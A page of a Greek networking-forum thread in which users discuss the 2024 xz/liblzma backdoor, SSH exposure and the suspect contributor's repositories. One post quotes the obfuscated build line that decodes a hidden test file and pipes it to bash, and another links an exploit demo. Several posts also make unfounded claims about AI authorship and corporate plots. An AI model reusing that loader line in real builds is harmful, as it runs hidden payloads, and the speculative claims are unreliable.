Σελ. 4 από 7 ΠρώτηΠρώτη ... 23456 ... ΤελευταίαΤελευταία
Εμφάνιση 46-60 από 103
  1. #46
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    47
    Μηνύματα
    6.727
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Παράθεση Αρχικό μήνυμα από jim_p Εμφάνιση μηνυμάτων
    Αν καποιος κανει ενα καινουριο ssh key στο σερβερ του, δεν ειναι προστατευμενος απο ολο αυτο?
    Μάλλον όχι. Αν φορτώνεται η μολυσμένη liblzma μαζί με τον sshd, τότε θα συνεχίσει να υφίσταται το backdoor.

    Εν τω μεταξύ διάβαζα χθες το techrights (ένα blog που είναι κάργα αντί-Microsoft) και έλεγε ο τύπος ότι αυτό με το xz και το backdoor (και κανά 2-3 άλλα security vulnerabilities) βγήκε στον αέρα για να στρέψει τα φώτα της δημοσιότητας μακρυά από τους χιλιάδες απατσάριστων Exchange servers που είναι τρύπιοι: https://techrights.org/n/2024/03/31/...eal-news.shtml

    Δεν ξέρω, τραβηγμένο μεν, αλλά δεν το αποκλείω να έχει και μια βάση αλήθειας.
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  2. #47
    Εγγραφή
    08-03-2007
    Μηνύματα
    25.531
    Downloads
    26
    Uploads
    0
    ISP
    ΟΤΕ Conn-x
    Γιατι να φορτωνεται και η προβληματικη liblzma αφου ενημερωθηκε?
    ديميتريس

  3. #48
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    47
    Μηνύματα
    6.727
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Παράθεση Αρχικό μήνυμα από jim_p Εμφάνιση μηνυμάτων
    Γιατι να φορτωνεται και η προβληματικη liblzma αφου ενημερωθηκε?
    Ε προφανώς αν ενημερώθηκε δε θα φορτώνεται.
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  4. #49
    Εγγραφή
    08-03-2007
    Μηνύματα
    25.531
    Downloads
    26
    Uploads
    0
    ISP
    ΟΤΕ Conn-x
    Οποτε παμε σε αυτο που ειπα, πως αν καποιος εχει καινουρια κλειδια και μη προβληματικο xz + παρελκομενα, εινια ασφαλης.
    Επισης, διανομες που ερχονται με ssh προεγκατεστημενο και ενεργο by default, πχ alpine, δεν θα επρεπε να κανουν το παραπανω αυτοματα?
    ديميتريس

  5. #50
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    47
    Μηνύματα
    6.727
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Το ότι θα αλλάξεις το κλειδί του sshd δε σημαίνει αυτόματα ότι σώζεσαι.

    Κι ένα ωραίο infographic:

    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  b5157017fbcebb8d.png 
Εμφανίσεις:  39 
Μέγεθος:  781,8 KB 
ID: 255110
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  6. #51
    Εγγραφή
    31-05-2007
    Ηλικία
    54
    Μηνύματα
    5.717
    Downloads
    6
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    300000/150000
    ISP
    Cosmote
    DSLAM
    ΟΤΕ - ΤΕΡΨΙΘΕΑ
    Router
    GL-MT6000 (+openwrt)
    Παράθεση Αρχικό μήνυμα από GoofyX Εμφάνιση μηνυμάτων
    Κι ένα ωραίο infographic:
    Αυτός που το έγραψε είναι μερακλής πάντως.
    Εγώ περιμένω πότε θα αρχίσουν να ανακαλύπτουν modular
    (state/corporate-sponsored?) backdoors στο gcc + whatever lib.

    Θα μου πεις, το βλέπουν τόσα μάτια...
    ναι, σιγά μην υπάρχει άνθρωπος να καταλάβει όλο το gcc.
    Disclaimer:
    Any views or opinions expressed represent the official view of the voices in my head.

  7. #52
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    47
    Μηνύματα
    6.727
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Μωρέ μάτια το βλέπουν, το θέμα είναι να το πιάσουν.

    Όπως καταλαβαίνετε είναι γενικότερο πρόβλημα το όλο θέμα.
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  8. #53
    Εγγραφή
    17-03-2003
    Περιοχή
    Stockholm
    Μηνύματα
    3.130
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    Γρήγορη είναι
    ISP
    Telia
    Μα δεν θα κάτσουν να κοιτάξουν όλο τον κώδικα γραμμή γραμμή, γιατί προφανώς και μόνο οι του gcc θα καταλάβουν τον gcc (αυτό ισχύει και σε κλειστό κώδικα btw - και ειδικά σε κλειστό κώδικα με τα συχνά layoffs/αλλαγές δεν θέλω να σκέφτομαι πόσα άλλα "xz" υπάρχουν).

    Απλά θα δουν οτι κάπου κάτι άλλο σκάει και θα το διερευνύσουν όπως τον μερακλή που έπιασε το xz. Τώρα ειδικά, πολύς περισσότερος κόσμος είναι υποψιασμένος.

  9. #54
    Εγγραφή
    12-03-2019
    Περιοχή
    Thess
    Ηλικία
    31
    Μηνύματα
    473
    Downloads
    1
    Uploads
    0
    Τύπος
    Other / Άλλο
    Ταχύτητα
    ~ 20/20
    ISP
    (κ)ΟΤΕ 4G
    Router
    BT Home Hub 5A (OpenWRT)
    Παράθεση Αρχικό μήνυμα από Eruyome(MMXGN) Εμφάνιση μηνυμάτων
    Απλά θα δουν οτι κάπου κάτι άλλο σκάει και θα το διερευνύσουν όπως τον μερακλή που έπιασε το xz. Τώρα ειδικά, πολύς περισσότερος κόσμος είναι υποψιασμένος.
    Θα λειτουργήσει θετικά.

  10. #55
    Εγγραφή
    08-03-2007
    Μηνύματα
    25.531
    Downloads
    26
    Uploads
    0
    ISP
    ΟΤΕ Conn-x
    notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
    https://github.com/amlweems/xzbot
    ديميتريس

  11. #56
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από SWBiiLive Εμφάνιση μηνυμάτων
    αν αναρωτιέται κανείς ποια ηταν η μορφή της backdoor στην xz library, αυτή η γραμμή ειναι

    Κώδικας:
    " sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;"
    που οπως εξηγει αυτός που το βρηκε αφήνει ως αποτελεσμα...

    Κώδικας:
     "| bash"
    απο https://www.openwall.com/lists/oss-s...y/2024/03/29/4

    τόσο απλά γιατι παιρνει pipe την bash!

    και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

    π.χ.
    Κώδικας:
    grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh"  --include=*.{h,cpp} .
    δυστυχως δεν ειναι τοσο απλό το attack και με ενα απλο grep ΔΕΝ μπορει καποιος να το αποκαλυψει. Οχι οτι ειναι λάθος η grep εντολή που ειχα βαλει αλλά αυτή θα πρεπει να τρεξει αφου γινουν Deobfuscate όλα τα sed, tr, cut, eval κλπ στα ... 700 commits που εχει κάνει!!!

    Παράθεση Αρχικό μήνυμα από K1m0n Εμφάνιση μηνυμάτων
    1. Το όλο θέμα είναι ακόμα υπο διερεύνηση.

    2. Απ'όσο ξέρουμε (και απ'όσο καταλαβαίνω μια ματιά που έριξα..):

    Αν το ssh είναι προσβάσιμο από "έξω",
    και το backdoor είναι ενεργό,
    θα μπορούσε να συνδεθεί κάποιος 3ός (που έχει το κλειδί του backdoor),
    και να αποκτήσει πρόσβαση στο σύστημα.

    και ηδη εχουν αρχισει καποιοι και αναρωτιουνται μηπως δεν ειναι ανθρωπινο χερι πισω απο αυτην την επιθεση.

    ειναι παρα πολυ προχο αυτο που εγινε γιατι κανει backdoor και αλλες υπηρεσιες ταυτοχρονα οπως το ssh στην προκειμενη περιπτωση

    Παράθεση Αρχικό μήνυμα από GoofyX Εμφάνιση μηνυμάτων
    Το ότι θα αλλάξεις το κλειδί του sshd δε σημαίνει αυτόματα ότι σώζεσαι.

    Κι ένα ωραίο infographic:

    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  b5157017fbcebb8d.png 
Εμφανίσεις:  39 
Μέγεθος:  781,8 KB 
ID: 255110
    αυτο το σχεδιαγραμμα δειχνει ποσο περιπλοκη ειναι η επιθεση και εγω ειμαι πλεον της αποψης οτι δεν ειναι ανθρωπινο χερι λογω πολυπλοκοτητας

    ΑΙ εγραψε ο prophet ... https://gynvael.coldwind.pl/?id=782

    "
    2024-03-31 19:14:58 = prophet
    {
    i think Jia Tan is an AI
    }
    "

    δεν ξέρω αν ειναι ΑΙ αλλά ενα ειναι το σιγουρο... ΘΑ ΜΠΟΡΟΥΣΕ ακριβως για τον λογο του οτι μια τετοια επιθεση στον κωδικα μονο με... νοημοσυνη ανιχνευεται!

    υ.γ. επισης αυτος που το ανακάλυψε ειναι της MS ....
    Τελευταία επεξεργασία από το μέλος SWBiiLive : 02-04-24 στις 19:53.

  12. #57
    Εγγραφή
    01-04-2006
    Περιοχή
    Cambridge, UK
    Μηνύματα
    1.423
    Downloads
    6
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    400 Mbps ⇋ 400 Mbps
    ISP
    Cambridge Fibre
    Router
    Linksys MR8300
    https://learn.microsoft.com/en-us/cp...?view=msvc-170

    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  Screenshot 2024-04-02 165106.jpg 
Εμφανίσεις:  77 
Μέγεθος:  48,8 KB 
ID: 255138


    Φανταστείτε τι άλλο έχουν ακουμπήσει.

  13. #58
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από Tsene Εμφάνιση μηνυμάτων
    https://learn.microsoft.com/en-us/cp...?view=msvc-170

    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  Screenshot 2024-04-02 165106.jpg 
Εμφανίσεις:  77 
Μέγεθος:  48,8 KB 
ID: 255138


    Φανταστείτε τι άλλο έχουν ακουμπήσει.
    αυτό ειναι το ακριβες λινκ που ειναι ΑΚΟΜΑ UP οπως και του GITHUB του λογαριαμου... what?

    jiaT75 on MS
    https://learn.microsoft.com/en-us/cp...y-contributors

    to link παει στο github του που ειναι UP
    https://github.com/JiaT75

    οργανισμος ... ο TOYKAΑNI. εεεε github ολα καλα?
    https://github.com/tukaani-project


    repositories 10 ...
    https://github.com/JiaT75?tab=repositories

    και εχουμε και κλαιμε!
    https://github.com/JiaT75/oss-fuzz <-- ΚΑΙ ΤΩΡΑ ΑΡΧΙΖΟΥΝ ΤΑ ΔΥΣΚΟΛΑ ΓΙΑ ΤΗΝ ΓKOYLAGK... google / oss-fuzz . AYTO EINAI TO ΜΟΝΑΔΙΚΟ REPO ΠΟΥ ΕΙΝΑΙ ΓΙΑ... HACKERS... TYXAIO? ΔΕΝ ΝΟΜΙΖΩ
    https://github.com/JiaT75/cpp-docs
    https://github.com/JiaT75/wasmtime <-- A standalone runtime for WebAssembly. δηλαδη ολοι οι συγχρονοι browsers !!! back to palemoon on windows 7 asap
    https://github.com/JiaT75/squashfs-tools <-- Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes and directories. Squashfs is used by the Live CD versions of Arch Linux, Clonezilla, Debian, Fedora, Gentoo Linux, KDE neon, Kali Linux, Linux Mint, NixOS, Salix, Ubuntu, openSUSE and on embedded distributions such as the OpenWrt[1] and DD-WRT router firmware.

    ΑΝ ΕΧΕΙ ΠΕΙΡΑΞΕΙ ΑΥΤΟ ΕΔΩ ΘΑ ΜΙΛΑΜΕ ΓΙΑ ΑΣΥΛΛΗΠΤΑ ΤΕΡΑΣΤΙΑ ΖΗΜΙΑ

    https://github.com/JiaT75/STest
    https://github.com/JiaT75/libarchive <-- The libarchive project develops a portable, efficient C library that can read and write streaming archives in a variety of formats. It also includes implementations of the common tar, cpio, and zcat command-line tools that use the libarchive library.
    https://github.com/JiaT75/seatest
    https://github.com/JiaT75/zstd
    https://github.com/JiaT75/lz4 < --- λολ Beyond the C reference source, many contributors have created versions of lz4 in multiple languages (Java, C#, Python, Perl, Ruby, etc.). A list of known source ports is maintained on the LZ4 Homepage. TO firefox το χρησιμοποιει απο οτι ξερω. εδω ειμαστε να δειτε για ποτε θα σκασει και αυτο!!!
    https://github.com/JiaT75/ZipArchive <---- ZipArchive is a simple utility class for zipping and unzipping files on iOS, macOS and tvOS. WHAT?

    ΕΠΙΣΗΣ ... ΑΦΗΝΩ τις 2 πρωτες δραστηριοτητες του... 1α σε private και μετα στα lz4 που τα χρησιμοποιει κατακορον ο FIREFOX, ο μοναδικός πλεον αντιπαλος του Chromium ακα Chrome + edge +κλπ = 70% της αγορας! ΠΗΓΗ. https://gs.statcounter.com/browser-market-share

    ΑΡΧΙΚΑ
    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  JiaT75 (JiaT75) _1ST-Repositories · GitHub.JPG 
Εμφανίσεις:  12 
Μέγεθος:  72,2 KB 
ID: 255143
    KAI META
    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  JiaT75 (JiaT75) _ Repositories · FIRST-ATTACKS.JPG 
Εμφανίσεις:  10 
Μέγεθος:  86,2 KB 
ID: 255144


    Υ.Γ. τιποτα δεν ειναι τυχαιο στην ζωη ... και τωρα καταλαβα γιατι δεν το εκλεισε το github το να τα δουμε... οι ενδειξεις σιγουρα δεν ειναι αποδειξεις αλλα αν δεν μαθουμε ποια private repo χρησιμοποιουσε δεν προκειται να βγαλουμε ασφαλη συμπερασματα. ομως δυστυχως για την γκουγκλ το repo της ειναι το μονο που δεν εχει καμια σχεση με ολα τα υπολοιπα που ειναι για συμπιεση ΚΑΙ οτι τα firefox + SAFARI που στοχοποιηθηκαν απο την δραστηριοτητα αυτου του jiT75 ειναι οι μοναδικοι αντιπαλοι του ... chromium !
    Τελευταία επεξεργασία από το μέλος SWBiiLive : 02-04-24 στις 20:07.

  14. #59
    Εγγραφή
    11-12-2003
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    47
    Μηνύματα
    6.727
    Downloads
    6
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    DSLAM
    ΟΤΕ - ΤΟΥΜΠΑ
    Router
    Fritz!box 7530
    Τα private repositories μην τα κοιτάς, τα public έχει σημασία. Προσπαθώ να βρω στο github τα PR του χρήστη αυτού, αλλά δεν φαίνεται να βρίσκει κάτι, εκτός αν κάνω κάτι λάθος εγώ.

    Ό,τι έγινε έγινε, κάθε repository που έκανε commit ο συγκεκριμένος το ψάχνουν οι υπόλοιποι devs.

    Το θέμα είναι από τώρα και έπειτα τι γίνεται...
    ... Morpheus: What is "real"? How do you define "real"? If you 're talking about what you can feel, what you can smell, what you can taste and see, then "real" is simply electrical signals interpreted by your brain...
    __________
    Η σελίδα μου - e-tameio

  15. #60
    Εγγραφή
    28-03-2024
    Μηνύματα
    29
    Downloads
    0
    Uploads
    0
    ISP
    πΟΤΕss
    Παράθεση Αρχικό μήνυμα από GoofyX Εμφάνιση μηνυμάτων
    Τα private repositories μην τα κοιτάς, τα public έχει σημασία. Προσπαθώ να βρω στο github τα PR του χρήστη αυτού, αλλά δεν φαίνεται να βρίσκει κάτι, εκτός αν κάνω κάτι λάθος εγώ.

    Ό,τι έγινε έγινε, κάθε repository που έκανε commit ο συγκεκριμένος το ψάχνουν οι υπόλοιποι devs.

    Το θέμα είναι από τώρα και έπειτα τι γίνεται...
    μέχρι να βρουν οι devs του firefox τι εκανε ο λεγαμενος στην lz4, firefox δεν ξαναχρησιμοποιοω στα linux και σταματαω και τo chromium και μαλλον θα ξαναγυρισω στα windows 7 και στο palemoon που δεν χρησιμοποιει WebAssembly

    ειχαμε καταλαβει οτι κατι δεν παει καλα με το chromium projectσ οταν στην σελιδα του με τα fork του υπαρχουν μονο το chrome και το chromiumOS (ουτε καν ο edge που της εδωσε +5%) https://www.chromium.org/chromium-projects/

    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  CHROMIUM-PROJECTS.JPG 
Εμφανίσεις:  2 
Μέγεθος:  103,0 KB 
ID: 255147


    υ.γ. φαινεται εχει μαζεψει πολλους πονηρους στα γραφεια της...


Σελ. 4 από 7 ΠρώτηΠρώτη ... 23456 ... ΤελευταίαΤελευταία

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας